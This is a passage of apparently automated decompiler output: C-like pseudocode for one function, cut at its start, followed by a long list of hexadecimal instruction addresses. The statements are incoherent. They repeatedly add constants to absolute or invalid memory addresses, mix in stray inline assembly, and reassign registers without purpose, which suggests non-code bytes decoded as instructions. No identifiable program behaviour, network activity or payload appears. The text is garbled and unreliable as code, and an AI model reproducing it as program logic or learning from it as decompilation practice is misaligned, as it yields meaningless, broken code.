				 *_t347 =  *_t347 + 0x1a;
				 *((intOrPtr*)(_t411 + 0x7621ca00)) =  *((intOrPtr*)(_t411 + 0x7621ca00)) + _t433;
				 *_t444 =  *_t444 + 0x1a;
				 *_t419 =  *_t419 + _t419;
				 *_t347 =  *_t347 & _t347;
				 *_t347 =  *_t347 + 0x1a;
				 *((intOrPtr*)(_t411 + 0x7b21e000)) =  *((intOrPtr*)(_t411 + 0x7b21e000)) + _t433;
				 *_t440 =  *_t440 + 0x1a;
				 *_t411 =  *_t411 + _t411;
				 *_t347 =  *_t347 & _t347;
				 *_t347 =  *_t347 + 0x1a;
				 *((intOrPtr*)(_t411 + 0x7b21f000)) =  *((intOrPtr*)(_t411 + 0x7b21f000)) + _t433;
				 *_t440 =  *_t440 + 0x1a;
				 *((intOrPtr*)(_t347 + 0x27)) =  *((intOrPtr*)(_t347 + 0x27)) + _t411;
				 *((intOrPtr*)(_t444 - 0x68ddf800)) =  *((intOrPtr*)(_t444 - 0x68ddf800)) + _t433;
				 *_t440 =  *_t440 + 0x1a;
				 *_t444 =  *_t444 + _t411;
				 *_t347 =  *_t347 & _t347;
				 *_t347 =  *_t347 + 0x1a;
				 *((intOrPtr*)(_t444 - 0x6cf1dae8)) =  *((intOrPtr*)(_t444 - 0x6cf1dae8)) + 0x1a;
				 *_t347 =  *_t347 + _t419;
				 *_t444 =  *_t444 + _t347;
				 *_t347 =  *_t347 & _t347;
				 *_t347 =  *_t347 + 0x1a;
				 *((intOrPtr*)(_t419 + 0x6e221718)) =  *((intOrPtr*)(_t419 + 0x6e221718)) + _t433;
				 *_t347 =  *_t347 + _t419;
				_t466[8] = _t466[8] + _t433;
				 *_t347 =  *_t347 + 0x1a;
				 *_t347 =  *_t347 + 0x1a;
				_t348 = _t411;
				_t412 = _t347;
				 *_t433 =  *_t433 + _t419;
				asm("daa");
				 *_t348 =  *_t348 + 0x1a;
				 *_t348 =  *_t348 + 0x1a;
				_t445 = _t348;
				 *0xFFFFFFFFFC000822 =  *((intOrPtr*)(0xfffffffffc000822)) + 0x1a;
				asm("in al, 0x0");
				_t350 = _t444 |  *_t444;
				 *((intOrPtr*)(_t445 - 0xaddb300)) =  *((intOrPtr*)(_t445 - 0xaddb300)) + 0xfc000800;
				 *((intOrPtr*)(_t350 + _t350)) =  *((intOrPtr*)(_t350 + _t350)) + _t419;
				 *_t350 =  *_t350 & _t350;
				 *_t350 =  *_t350 + 0x1a;
				 *((intOrPtr*)(_t419 + 0x6e225b00)) =  *((intOrPtr*)(_t419 + 0x6e225b00)) + 0xfc000800;
				 *((intOrPtr*)(_t350 + _t350)) =  *((intOrPtr*)(_t350 + _t350)) + _t419;
				 *_t350 =  *_t350 & _t350;
				 *_t350 =  *_t350 + 0x1a;
				 *((intOrPtr*)(_t445 + 0x6e226a00)) =  *((intOrPtr*)(_t445 + 0x6e226a00)) + 0xfc000800;
				 *((intOrPtr*)(_t350 + _t350)) =  *((intOrPtr*)(_t350 + _t350)) + _t419;
				_t442 = 0x28;
				 *_t350 =  *_t350 & _t350;
				 *_t350 =  *_t350 + 0x1a;
				 *((intOrPtr*)(_t419 + 0x6e229f00)) =  *((intOrPtr*)(_t419 + 0x6e229f00)) + 0xfc000800;
				 *((intOrPtr*)(_t350 + _t350)) =  *((intOrPtr*)(_t350 + _t350)) + _t419;
				_push(ds);
				 *_t350 =  *_t350 & _t350;
				 *_t350 =  *_t350 + 0x1a;
				 *((intOrPtr*)(_t445 - 0x6cf1dae8)) =  *((intOrPtr*)(_t445 - 0x6cf1dae8)) + 0x1a;
				 *((intOrPtr*)(_t350 + _t350)) =  *((intOrPtr*)(_t350 + _t350)) + _t419;
				asm("insd");
				 *_t350 =  *_t350 & _t350;
				 *_t350 =  *_t350 + 0x1a;
				 *((intOrPtr*)(_t419 + 0x6e221718)) =  *((intOrPtr*)(_t419 + 0x6e221718)) + 0xfc000800;
				 *((intOrPtr*)(_t350 + _t350)) =  *((intOrPtr*)(_t350 + _t350)) + _t419;
				 *_t350 = gs;
				 *_t350 =  *_t350 + 0x1a;
				 *_t350 =  *_t350 + 0x1a;
				_t446 = _t350;
				_t442[0x30041c8] = _t442[0x30041c8] + _t419;
				_t352 = _t445 + 0x1a;
				 *_t352 =  *_t352 - 0x1a;
				 *_t352 =  *_t352 + 0x1a;
				 *((intOrPtr*)(_t446 + 0x2922c600)) =  *((intOrPtr*)(_t446 + 0x2922c600)) + 0xfc000800;
				 *0x294c00 =  *0x294c00 + _t419;
				 *_t352 =  *_t352 + 0x1a;
				 *((intOrPtr*)(_t446 + 0x6722ff00)) =  *((intOrPtr*)(_t446 + 0x6722ff00)) + 0xfc000800;
				 *_t446 =  *_t446 + _t419;
				 *((intOrPtr*)(_t352 + 0x29)) =  *((intOrPtr*)(_t352 + 0x29)) + _t352;
				 *((intOrPtr*)(_t446 - 0x6adcb400)) =  *((intOrPtr*)(_t446 - 0x6adcb400)) + 0xfc000800;
				 *_t419 =  *_t419 + 0xfc000800;
				 *_t352 =  *_t352 + _t352;
				_t353 = _t352 -  *_t352;
				 *_t353 =  *_t353 + 0x1a;
				 *((intOrPtr*)(_t446 + 0x29236f00)) =  *((intOrPtr*)(_t446 + 0x29236f00)) + 0xfc000800;
				 *0xfc000800 =  *0xfc000800 + 0xfc000800;
				 *((intOrPtr*)(0xfc000800 + _t466)) =  *((intOrPtr*)(0xfc000800 + _t466)) + _t419;
				 *_t353 =  *_t353 + 0x1a;
				 *((intOrPtr*)(_t419 - 0x48dc6400)) =  *((intOrPtr*)(_t419 - 0x48dc6400)) + 0xfc000800;
				 *_t412 =  *_t412 + 0xfc000800;
				 *_t446 =  *_t446 + _t412;
				 *_t353 =  *_t353 & _t353;
				 *_t353 =  *_t353 + 0x1a;
				 *((intOrPtr*)(_t446 - 0x6cf1dae8)) =  *((intOrPtr*)(_t446 - 0x6cf1dae8)) + _t353;
				 *_t446 =  *_t446 + 0xfc000800;
				 *((intOrPtr*)(0xfc000800 + _t466)) =  *((intOrPtr*)(0xfc000800 + _t466)) + _t353;
				 *((intOrPtr*)(_t446 + 0x24)) =  *((intOrPtr*)(_t446 + 0x24)) + _t419;
				_push(ss);
				 *0x0000002D =  *((intOrPtr*)(0x2d)) + _t412;
				 *2 =  *2 + 2;
				 *2 =  *2 + 2;
				 *((intOrPtr*)(_t412 + 0x10)) =  *((intOrPtr*)(_t412 + 0x10)) + _t419;
				 *0xfc000800 =  *0xfc000800 + 1;
				asm("sbb [eax], al");
				L1();
				 *0x52106B02 =  *((intOrPtr*)(0x52106b02)) + 0xfc000800;
				_t413 = _t412 +  *0xfc000800;
				 *((intOrPtr*)(_t466 + _t469)) =  *((intOrPtr*)(_t466 + _t469)) + _t419;
				_t449 = _t353;
				 *((intOrPtr*)(_t413 + 0x10)) =  *((intOrPtr*)(_t413 + 0x10)) + _t419;
				 *_t413 =  *_t413 + 0x1c;
				 *0x00000004 =  *0x00000004 + 2;
				 *((intOrPtr*)(_t449 - 0x35db8000)) =  *((intOrPtr*)(_t449 - 0x35db8000)) + 0xfc000800;
				_t414 = _t413 +  *0x2d7800;
				 *0x00000004 =  *0x00000004 + 2;
				 *((intOrPtr*)(_t449 + 0x40f8300)) =  *((intOrPtr*)(_t449 + 0x40f8300)) + 0xfc000800;
				_t360 = _t449;
				 *((intOrPtr*)(_t414 + 0x1f04040f)) =  *((intOrPtr*)(_t414 + 0x1f04040f)) + 2;
				 *_t360 =  *_t360 + 2;
				 *[cs:eax] =  *[cs:eax] + 2;
				 *_t360 =  *_t360 + 2;
				_t361 = _t419;
				_t420 = _t360;
				 *((intOrPtr*)(_t420 + 0x20044924)) =  *((intOrPtr*)(_t420 + 0x20044924)) + 0xfc000800;
				 *((intOrPtr*)(_t361 + 0x2e)) =  *((intOrPtr*)(_t361 + 0x2e)) + _t420;
				 *((intOrPtr*)(_t420 - 0x37db5800)) =  *((intOrPtr*)(_t420 - 0x37db5800)) + 0xfc000800;
				_t362 = _t361 + 0x22;
				 *0x00000004 =  *0x00000004 + _t414;
				 *_t362 =  *_t362 & _t362;
				 *_t362 =  *_t362 + 2;
				 *0xFFFFFFFF930E251C =  *((intOrPtr*)(0xffffffff930e251c)) + 2;
				 *0x315000 =  *0x315000 + _t362;
				 *_t362 =  *_t362 + 2;
				 *((intOrPtr*)(_t414 - 0x66f07600)) =  *((intOrPtr*)(_t414 - 0x66f07600)) + 2;
				_t363 = _t362 +  *0x211e00;
				 *_t363 =  *_t363 + 2;
				 *((intOrPtr*)(0xffffffff930e251c)) =  *((intOrPtr*)(0xffffffff930e251c)) + 2;
				 *0x00000004 =  *0x00000004 + _t363;
				 *((intOrPtr*)(_t420 + 0x21)) =  *((intOrPtr*)(_t420 + 0x21)) + _t414;
				 *_t363 =  *_t363 + 2;
				 *_t363 =  *_t363 + 2;
				 *_t363 =  *_t363 + 0xffffff97;
				asm("adc [esp+eax], bh");
				 *[es:edi+0x21] =  *[es:edi+0x21] + 2;
				 *((intOrPtr*)(_t414 + 0x1110ad00)) =  *((intOrPtr*)(_t414 + 0x1110ad00)) + 2;
				_t364 = _t363 + 0x21aa0027;
				 *_t364 =  *_t364 + 2;
				 *_t364 =  *_t364 + 2;
				_t365 = _t420;
				asm("sbb [edi], dl");
				_t422 = _t364 &  *0x00000004;
				 *_t365 =  *_t365 - 2;
				_push(ds);
				 *_t365 =  *_t365 & _t365;
				 *_t365 =  *_t365 + 2;
				 *((intOrPtr*)(0xffffffff930e251c)) =  *((intOrPtr*)(0xffffffff930e251c)) + 2;
				 *_t365 =  *_t365 + _t422;
				 *0x00000025 =  *((intOrPtr*)(0x25)) + 0xfc000800;
				 *((intOrPtr*)(_t414 + 0x4e0f6400)) =  *((intOrPtr*)(_t414 + 0x4e0f6400)) + 2;
				_t423 = _t422 +  *_t365;
				 *0x00000004 =  *0x00000004 + _t414;
				 *_t365 =  *_t365 & _t365;
				 *_t365 =  *_t365 + 2;
				 *((intOrPtr*)(0xffffffff930e251c)) =  *((intOrPtr*)(0xffffffff930e251c)) + 2;
				 *_t423 =  *_t423 + _t423;
				 *((intOrPtr*)(_t365 + 0x32)) =  *((intOrPtr*)(_t365 + 0x32)) + _t423;
				 *_t365 =  *_t365 + 2;
				 *_t365 =  *_t365 + 2;
				 *_t365 =  *_t365 + 0x10;
				_t366 = _t365 & 0x0029056a;
				_push(ds);
				 *_t366 =  *_t366 & _t366;
				 *_t366 =  *_t366 + 2;
				 *((intOrPtr*)(0xffffffff930e251c)) =  *((intOrPtr*)(0xffffffff930e251c)) + 2;
				 *0xfc000800 =  *0xfc000800 + _t423;
				 *((intOrPtr*)(0x25)) =  *((intOrPtr*)(0x25)) + _t414;
				 *((intOrPtr*)(_t414 + 0x3c253400)) =  *((intOrPtr*)(_t414 + 0x3c253400)) + 2;
				_t368 = _t366 + 0xfffffffffc00082a;
				 *_t368 =  *_t368 & _t368;
				 *_t368 =  *_t368 + 2;
				 *((intOrPtr*)(_t414 - 0x66dabd00)) =  *((intOrPtr*)(_t414 - 0x66dabd00)) + 2;
				_t424 = _t423 +  *_t414;
				 *0xFFFFFFFFFC000804 =  *((intOrPtr*)(0xfffffffffc000804)) + _t424;
				 *_t368 =  *_t368 + 0x57;
				_t369 = _t368 & 0x002c057f;
				_push(ds);
				 *_t369 =  *_t369 & _t369;
				 *_t369 =  *_t369 + 2;
				 *((intOrPtr*)(0xffffffff930e251c)) =  *((intOrPtr*)(0xffffffff930e251c)) + 2;
				 *0x21e700 =  *0x21e700 + _t424;
				 *_t369 =  *_t369 + 2;
				 *((intOrPtr*)(_t414 + 0x3c258200)) =  *((intOrPtr*)(_t414 + 0x3c258200)) + 2;
				_t370 = _t369 + 0x2d;
				_t435 = 0xfc000800 + _t414;
				 *_t370 =  *_t370 & _t370;
				 *_t370 =  *_t370 + 2;
				 *((intOrPtr*)(_t424 + 0x6e221718)) =  *((intOrPtr*)(_t424 + 0x6e221718)) + _t435;
				 *0x00000004 =  *0x00000004 + _t424;
				 *0x00000004 =  *0x00000004 + _t414;
				 *_t370 =  *_t370 & _t370;
				 *_t370 =  *_t370 + 2;
				 *((intOrPtr*)(0xffffffff930e251c)) =  *((intOrPtr*)(0xffffffff930e251c)) + 2;
				 *0x00000004 =  *0x00000004 + _t424;
				 *((intOrPtr*)(0x25)) =  *((intOrPtr*)(0x25)) + _t435;
				 *((intOrPtr*)(_t414 + 0x4e259e00)) =  *((intOrPtr*)(_t414 + 0x4e259e00)) + 2;
				_t425 = _t424 +  *0x00000004;
				 *((intOrPtr*)(4 + _t414)) =  *((intOrPtr*)(4 + _t414)) + _t370;
				 *_t370 =  *_t370 + 2;
				 *_t370 =  *_t370 + 2;
				_t451 = _t370;
				 *((intOrPtr*)(_t451 + 0x2f05e125)) =  *((intOrPtr*)(_t451 + 0x2f05e125)) + _t414;
				 *((intOrPtr*)(_t414 + _t451)) =  *((intOrPtr*)(_t414 + _t451)) + _t435;
				_t436 = _t435 + _t414;
				_push(es);
				_t374 = _t451 & 0x0032064a &  *(_t451 & 0x0032064a);
				 *_t374 =  *_t374 + 2;
				 *((intOrPtr*)(_t425 + 0x6e221718)) =  *((intOrPtr*)(_t425 + 0x6e221718)) + _t436;
				 *_t442 = _t436 +  *_t442;
				 *0x00000004 =  *0x00000004 + _t414;
				 *_t374 =  *_t374 & _t374;
				 *_t374 =  *_t374 + 2;
				 *((intOrPtr*)(0xffffffff930e251c)) =  *((intOrPtr*)(0xffffffff930e251c)) + 2;
				 *_t442 = _t436 +  *_t442;
				 *0xfc000800 =  *0xfc000800 + _t436;
				_t375 = _t374 &  *_t374;
				 *_t375 =  *_t375 + 2;
				 *((intOrPtr*)(_t414 - 0x7cd9f900)) =  *((intOrPtr*)(_t414 - 0x7cd9f900)) + 2;
				_push(es);
				asm("aaa");
				 *((intOrPtr*)(4 + _t469)) =  *((intOrPtr*)(4 + _t469)) + _t425;
				 *_t375 =  *_t375 + 2;
				 *_t375 =  *_t375 + 2;
				_t376 = 4;
				_t453 = _t375;
				 *((intOrPtr*)(_t414 + 0x26)) =  *((intOrPtr*)(_t414 + 0x26)) + 2;
				asm("clc");
				_push(es);
				if( *0x00000004 >= 2) {
					 *0x00000004 =  *0x00000004 + 2;
					 *0x00000004 =  *0x00000004 + 2;
					 *((intOrPtr*)(_t414 + 0x26)) =  *((intOrPtr*)(_t414 + 0x26)) + _t436;
					es = 0xfc000800;
					_t406 = _t453;
					 *[ss:eax] =  *[ss:eax] + 2;
					 *_t406 =  *_t406 + 2;
					_t465 = _t406;
					_t466[0xf426009] = _t466[0xf426009] + 2;
					 *((intOrPtr*)(8)) =  *((intOrPtr*)(8)) + 2;
					_t465[0x349a440] = _t436 + _t465[0x349a440];
					_t414 = _t414 |  *_t465;
					 *_t442 =  *_t442 + _t425;
					_t376 = _t465;
					_t453 = 8;
					 *((intOrPtr*)(_t425 + 0x400a6926)) =  *((intOrPtr*)(_t425 + 0x400a6926)) + _t436;
				}
				 *0x22 =  *0x22 + _t436;
				_t453[0x1c837bc2] = _t376 + _t453[0x1c837bc2];
				 *_t414 = _t376 +  *_t414;
				asm("sbb eax, 0x22");
				 *((intOrPtr*)(_t453 - 0x66d904f8)) =  *((intOrPtr*)(_t453 - 0x66d904f8)) + _t376;
				_t378 = _t376 +  *_t414 &  *[es:eax];
				 *_t378 =  *_t378 + _t378;
				_t453[0x689c102] = _t453[0x689c102] + _t378;
				 *((intOrPtr*)(_t378 + _t378 + 0x2e)) =  *((intOrPtr*)(_t378 + _t378 + 0x2e)) + _t378;
				_t379 = _t378 &  *_t378;
				 *_t379 =  *_t379 + _t379;
				 *((intOrPtr*)(_t453 - 0x77d8f1f8)) =  *((intOrPtr*)(_t453 - 0x77d8f1f8)) + _t379;
				_t380 = _t379 |  *(_t379 + _t379 + 0x1e);
				 *_t380 =  *_t380 & _t380;
				 *_t380 =  *_t380 + _t380;
				 *((intOrPtr*)(_t453 - 0x6cf1dae8)) =  *((intOrPtr*)(_t453 - 0x6cf1dae8)) + _t380;
				 *_t466 =  *_t466 + _t380;
				asm("aaa");
				_t381 = _t380 &  *_t380;
				 *_t381 =  *_t381 + _t381;
				 *((intOrPtr*)(_t453 - 0x72f1dae8)) =  *((intOrPtr*)(_t453 - 0x72f1dae8)) + _t381;
				_t382 = _t381 |  *_t466;
				_push(ds);
				 *_t382 =  *_t382 & _t382;
				 *_t382 =  *_t382 + _t382;
				 *((intOrPtr*)(_t453 - 0x6cf1dae8)) =  *((intOrPtr*)(_t453 - 0x6cf1dae8)) + _t382;
				 *_t442 =  *_t442 + _t382;
				_t383 = _t382 &  *_t382;
				 *_t383 =  *_t383 + _t383;
				 *((intOrPtr*)(_t414 - 0x15ed5a00)) =  *((intOrPtr*)(_t414 - 0x15ed5a00)) + _t383;
				 *_t442 =  *_t442 | _t383;
				_push(ds);
				 *_t383 =  *_t383 & _t383;
				 *_t383 =  *_t383 + _t383;
				 *((intOrPtr*)(_t453 - 0x6cf1dae8)) =  *((intOrPtr*)(_t453 - 0x6cf1dae8)) + _t383;
				 *_t383 =  *_t383 + _t425;
				asm("pushad");
				_t384 = _t383 &  *_t383;
				 *_t384 =  *_t384 + _t384;
				 *((intOrPtr*)(_t414 - 0x15ed3700)) =  *((intOrPtr*)(_t414 - 0x15ed3700)) + _t384;
				 *_t384 =  *_t384 | _t425;
				_push(ds);
				 *_t384 =  *_t384 & _t384;
				 *_t384 =  *_t384 + _t384;
				 *((intOrPtr*)(_t453 - 0x6cf1dae8)) =  *((intOrPtr*)(_t453 - 0x6cf1dae8)) + _t384;
				 *_t425 =  *_t425 + _t425;
				_t385 = _t384 ^ 0x0000003f;
				 *_t385 =  *_t385 + _t385;
				 *_t385 =  *_t385 + _t385;
				 *_t385 =  *_t385 + 0xffffffe2;
				asm("adc ch, dl");
				 *_t425 =  *_t425 | _t425;
				if( *_t425 == 0) {
					 *_t385 =  *_t385 + _t385;
					 *_t385 =  *_t385 + _t385;
					_t273 = _t385;
					_t385 = _t425;
					asm("sbb [edi], dl");
					_t425 = _t273 &  *_t453;
					_t436 = _t436 - 1;
					 *_t453 =  *_t453 + _t414;
					 *_t385 =  *_t385 & _t385;
					 *_t385 =  *_t385 + _t385;
					 *((intOrPtr*)(_t453 - 0x6cf1dae8)) =  *((intOrPtr*)(_t453 - 0x6cf1dae8)) + _t385;
					 *_t436 =  *_t436 + _t425;
					 *_t436 =  *_t436 & 0x00000000;
					 *_t385 =  *_t385 + 0x2f;
				}
				asm("das");
				asm("adc bl, [edx]");
				 *_t436 =  *_t436 | _t425;
				asm("adc ah, [edx]");
				 *_t385 =  *_t385 + _t385;
				 *_t385 =  *_t385 + _t385;
				 *_t385 =  *_t385 + 0x4c;
				asm("adc bh, [eax]");
				 *_t414 =  *_t414 | _t425;
				 *_t436 = _t469;
				 *_t385 =  *_t385 + _t385;
				 *_t385 =  *_t385 + _t385;
				 *_t385 =  *_t385 + 0x71;
				asm("adc bh, [ecx+0x8]");
				 *_t436 = _t436 +  *_t436;
				 *_t385 =  *_t385 + 0xffffff8e;
				asm("adc ch, [ebx+0x1e004d08]");
				 *_t385 =  *_t385 & _t385;
				 *_t385 =  *_t385 + _t385;
				 *((intOrPtr*)(_t453 - 0x6cf1dae8)) =  *((intOrPtr*)(_t453 - 0x6cf1dae8)) + _t385;
				 *_t453 =  *_t453 + _t425;
				asm("aas");
				 *_t385 =  *_t385 + _t385;
				 *_t385 =  *_t385 + _t385;
				 *_t385 =  *_t385 + 0xffffffec;
				asm("adc ecx, ecx");
				 *_t453 =  *_t453 | _t425;
				asm("pushfd");
				_t386 = _t385 &  *_t385;
				 *_t386 =  *_t386 + _t386;
				 *((intOrPtr*)(_t425 + 0x6e221718)) =  *((intOrPtr*)(_t425 + 0x6e221718)) + _t436;
				 *_t442 =  *_t442 + _t425;
				 *_t386 =  *_t386 & _t386;
				 *_t386 =  *_t386 + _t386;
				 *((intOrPtr*)(_t453 - 0x6cf1dae8)) =  *((intOrPtr*)(_t453 - 0x6cf1dae8)) + _t386;
				 *_t442 =  *_t442 + _t425;
				 *_t386 =  *_t386 + _t386;
				 *_t386 =  *_t386 + _t386;
				 *_t386 =  *_t386 + 0x26;
				asm("adc al, 0xc9");
				 *_t442 =  *_t442 | _t425;
				asm("int3");
				asm("aas");
				 *_t386 =  *_t386 + _t386;
				 *_t386 =  *_t386 + _t386;
				_t442[0x1402ca] = _t436 + _t442[0x1402ca];
				_t389 =  &(_t453[0]);
				 *_t389 = _t389 +  *_t389;
				 *_t389 = _t389 +  *_t389;
				_t390 = _t386;
				_t442[0x1482d0] = _t436 + _t442[0x1482d0];
				asm("loopne 0x42");
				 *_t390 =  *_t390 + _t390;
				 *_t390 =  *_t390 + _t390;
				_t391 = _t389;
				_t442[0x1542e1] = _t436 + _t442[0x1542e1];
				asm("aam 0x41");
				 *_t391 = _t391 +  *_t391;
				 *_t391 = _t391 +  *_t391;
				asm("daa");
				_t394 = ds;
				 *_t394 =  *_t394 + _t425;
				_t437 =  &(_t436[0]);
				 *_t394 =  *_t394 + _t394;
				 *_t394 =  *_t394 + _t394;
				_t396 =  &(_t391[2]);
				asm("daa");
				asm("fisttp qword [ebx]");
				 *((intOrPtr*)(_t437 + _t396 * 2)) =  *((intOrPtr*)(_t437 + _t396 * 2)) + 0xb;
				 *_t396 =  *_t396 + _t396;
				 *_t396 =  *_t396 + _t396;
				_t397 = _t394;
				_t459 = _t396;
				 *_t397 =  *_t397 + _t397;
				_t398 = _t397 - 0xb;
				asm("pushfd");
				_t438 =  &(_t437[0]);
				 *_t398 =  *_t398 + _t398;
				 *_t398 =  *_t398 + _t398;
				_t399 = _t459;
				_t442[0x180313] = _t438 + _t442[0x180313];
				asm("lock inc ebx");
				 *_t399 = _t399 +  *_t399;
				 *_t399 = _t399 +  *_t399;
				_t442[0xa] = _t442[0xa] + (0x0000000b |  *_t459);
				_pop(_t417);
				_t401 = _t398 | 0x00000064;
				 *_t401 =  *_t401 + _t401;
				 *_t401 =  *_t401 + _t401;
				 *_t401 =  *_t401 + _t401;
				_t402 = _t399;
				 *((intOrPtr*)(_t425 + 0x28)) =  *((intOrPtr*)(_t425 + 0x28)) + _t425;
				 *_t402 = _t402 +  *_t402;
				_t403 = _t401;
				_t463 = _t402;
				_t442[0x1a03314a] = _t442[0x1a03314a] + _t425;
				 *_t463 =  *_t463 + _t417;
				 *_t403 =  *_t403 & _t403;
				 *_t403 =  *_t403 + _t403;
				 *((intOrPtr*)(_t463 - 0x6cf1dae8)) =  *((intOrPtr*)(_t463 - 0x6cf1dae8)) + _t403;
				 *_t425 =  *_t425 + _t425;
				 *_t403 =  *_t403 + _t403;
				 *_t403 =  *_t403 + _t403;
				 *_t403 =  *_t403 + 0xffffffc3;
				asm("adc al, 0x3c");
				_t404 = _t403 + 0x69;
				 *_t463 =  *_t463 + _t417;
				 *_t404 =  *_t404 & _t404;
				 *_t404 =  *_t404 + _t404;
				 *((intOrPtr*)(_t463 - 0x6cf1dae8)) =  *((intOrPtr*)(_t463 - 0x6cf1dae8)) + _t404;
				 *_t438 =  *_t438 + 0x22;
				return _t404;
			}

0x0106f3ae
0x0106f3b3
0x0106f3b9
0x0106f3ba
0x0106f3bb
0x0106f3bd
0x0106f3c3
0x0106f3c7
0x0106f3c9
0x0106f3cb
0x0106f3cd
0x0106f3cf
0x0106f3d5
0x0106f3db
0x0106f3dd
0x0106f3de
0x0106f3df
0x0106f3e1
0x0106f3e3
0x0106f3e4
0x0106f3e5
0x0106f3e7
0x0106f3e9
0x0106f3ea
0x0106f3eb
0x0106f3ed
0x0106f3f0
0x0106f3f5
0x0106f3f6
0x0106f3f7
0x0106f3f9
0x0106f400
0x0106f401
0x0106f403
0x0106f405
0x0106f407
0x0106f408
0x0106f409
0x0106f40b
0x0106f411
0x0106f413
0x0106f419
0x0106f41a
0x0106f41f
0x0106f420
0x0106f421
0x0106f423
0x0106f426
0x0106f427
0x0106f429
0x0106f42b
0x0106f42e
0x0106f42f
0x0106f432
0x0106f433
0x0106f435
0x0106f437
0x0106f439
0x0106f43a
0x0106f43b
0x0106f443
0x0106f446
0x0106f44c
0x0106f44d
0x0106f44f
0x0106f45b
0x0106f45c
0x0106f45d
0x0106f45f
0x0106f46a
0x0106f46b
0x0106f471
0x0106f479
0x0106f47f
0x0106f485
0x0106f487
0x0106f48b
0x0106f48d
0x0106f491
0x0106f497
0x0106f4a3
0x0106f4a9
0x0106f4af
0x0106f4b5
0x0106f4bb
0x0106f4c1
0x0106f4c3
0x0106f4c5
0x0106f4c8
0x0106f4c9
0x0106f4cb
0x0106f4d1
0x0106f4d5
0x0106f4d7
0x0106f4da
0x0106f4db
0x0106f4dd
0x0106f4e0
0x0106f4e6
0x0106f4e7
0x0106f4e9
0x0106f4eb
0x0106f4ec
0x0106f4f3
0x0106f4f5
0x0106f4fd
0x0106f4ff
0x0106f501
0x0106f507
0x0106f50e
0x0106f50e
0x0106f50e
0x0106f516
0x0106f517
0x0106f519
0x0106f51a
0x0106f520
0x0106f526
0x0106f52c
0x0106f52d
0x0106f535
0x0106f537
0x0106f53d
0x0106f540
0x0106f542
0x0106f546
0x0106f548
0x0106f549
0x0106f54c
0x0106f54d
0x0106f54f
0x0106f551
0x0106f553
0x0106f555
0x0106f55b
0x0106f55d
0x0106f55f
0x0106f561
0x0106f563
0x0106f569
0x0106f56f
0x0106f571
0x0106f577
0x0106f579
0x0106f57b
0x0106f57d
0x0106f57f
0x0106f585
0x0106f587
0x0106f589
0x0106f58b
0x0106f58d
0x0106f593
0x0106f595
0x0106f597
0x0106f599
0x0106f59b
0x0106f5a1
0x0106f5a3
0x0106f5a9
0x0106f5af
0x0106f5b1
0x0106f5b3
0x0106f5b5
0x0106f5b7
0x0106f5bd
0x0106f5bf
0x0106f5c1
0x0106f5c3
0x0106f5c5
0x0106f5cb
0x0106f5cd
0x0106f5d0
0x0106f5d2
0x0106f5d4
0x0106f5d4
0x0106f5d5
0x0106f5dd
0x0106f5de
0x0106f5e0
0x0106f5e2
0x0106f5e3
0x0106f5e6
0x0106f5e8
0x0106f5ef
0x0106f5f5
0x0106f5f9
0x0106f5fb
0x0106f5fd
0x0106f603
0x0106f606
0x0106f609
0x0106f60b
0x0106f611
0x0106f614
0x0106f615
0x0106f617
0x0106f619
0x0106f61f
0x0106f622
0x0106f623
0x0106f625
0x0106f627
0x0106f62d
0x0106f630
0x0106f631
0x0106f633
0x0106f635
0x0106f63b
0x0106f63e
0x0106f640
0x0106f642
0x0106f644
0x0106f645
0x0106f64b
0x0106f64d
0x0106f64f
0x0106f651
0x0106f657
0x0106f65d
0x0106f65f
0x0106f665
0x0106f667
0x0106f66d
0x0106f673
0x0106f675
0x0106f677
0x0106f679
0x0106f67b
0x0106f681
0x0106f683
0x0106f687
0x0106f689
0x0106f68f
0x0106f691
0x0106f693
0x0106f695
0x0106f697
0x0106f69d
0x0106f69f
0x0106f6a7
0x0106f6ac
0x0106f6ad
0x0106f6b0
0x0106f6b2
0x0106f6b5
0x0106f6b8
0x0106f6ba
0x0106f6bc
0x0106f6c1
0x0106f6c7
0x0106f6c9
0x0106f6d0
0x0106f6d1
0x0106f6d4
0x0106f6db
0x0106f6dd
0x0106f6e3
0x0106f6e9
0x0106f6eb
0x0106f6ec
0x0106f6ed
0x0106f6f3
0x0106f6f5
0x0106f6f8
0x0106f6fa
0x0106f6fa
0x0106f6fb
0x0106f701
0x0106f707
0x0106f70d
0x0106f70f
0x0106f711
0x0106f713
0x0106f715
0x0106f71b
0x0106f721
0x0106f723
0x0106f729
0x0106f72f
0x0106f731
0x0106f737
0x0106f739
0x0106f73c
0x0106f73e
0x0106f740
0x0106f743
0x0106f746
0x0106f74d
0x0106f753
0x0106f758
0x0106f75a
0x0106f75c
0x0106f75d
0x0106f75f
0x0106f762
0x0106f764
0x0106f765
0x0106f767
0x0106f769
0x0106f76f
0x0106f771
0x0106f777
0x0106f77d
0x0106f77f
0x0106f781
0x0106f783
0x0106f785
0x0106f78b
0x0106f78d
0x0106f790
0x0106f792
0x0106f794
0x0106f797
0x0106f79c
0x0106f79d
0x0106f79f
0x0106f7a1
0x0106f7a7
0x0106f7a9
0x0106f7af
0x0106f7b7
0x0106f7b9
0x0106f7bb
0x0106f7bd
0x0106f7c3
0x0106f7c5
0x0106f7cc
0x0106f7cf
0x0106f7d4
0x0106f7d5
0x0106f7d7
0x0106f7d9
0x0106f7df
0x0106f7e5
0x0106f7e7
0x0106f7ed
0x0106f7ef
0x0106f7f1
0x0106f7f3
0x0106f7f5
0x0106f7fb
0x0106f7fd
0x0106f7ff
0x0106f801
0x0106f803
0x0106f809
0x0106f80b
0x0106f811
0x0106f817
0x0106f819
0x0106f81c
0x0106f81e
0x0106f820
0x0106f821
0x0106f827
0x0106f82f
0x0106f836
0x0106f837
0x0106f839
0x0106f83b
0x0106f841
0x0106f843
0x0106f845
0x0106f847
0x0106f849
0x0106f84f
0x0106f851
0x0106f853
0x0106f855
0x0106f857
0x0106f85d
0x0106f85e
0x0106f85f
0x0106f862
0x0106f864
0x0106f866
0x0106f866
0x0106f867
0x0106f86a
0x0106f86b
0x0106f86e
0x0106f870
0x0106f872
0x0106f875
0x0106f879
0x0106f87c
0x0106f87d
0x0106f880
0x0106f882
0x0106f883
0x0106f88d
0x0106f88f
0x0106f895
0x0106f897
0x0106f89e
0x0106f89e
0x0106f89f
0x0106f89f
0x0106f8a5
0x0106f8ab
0x0106f8b1
0x0106f8b4
0x0106f8b9
0x0106f8c2
0x0106f8c5
0x0106f8c7
0x0106f8cd
0x0106f8d1
0x0106f8d3
0x0106f8d5
0x0106f8db
0x0106f8df
0x0106f8e1
0x0106f8e3
0x0106f8e9
0x0106f8ec
0x0106f8ed
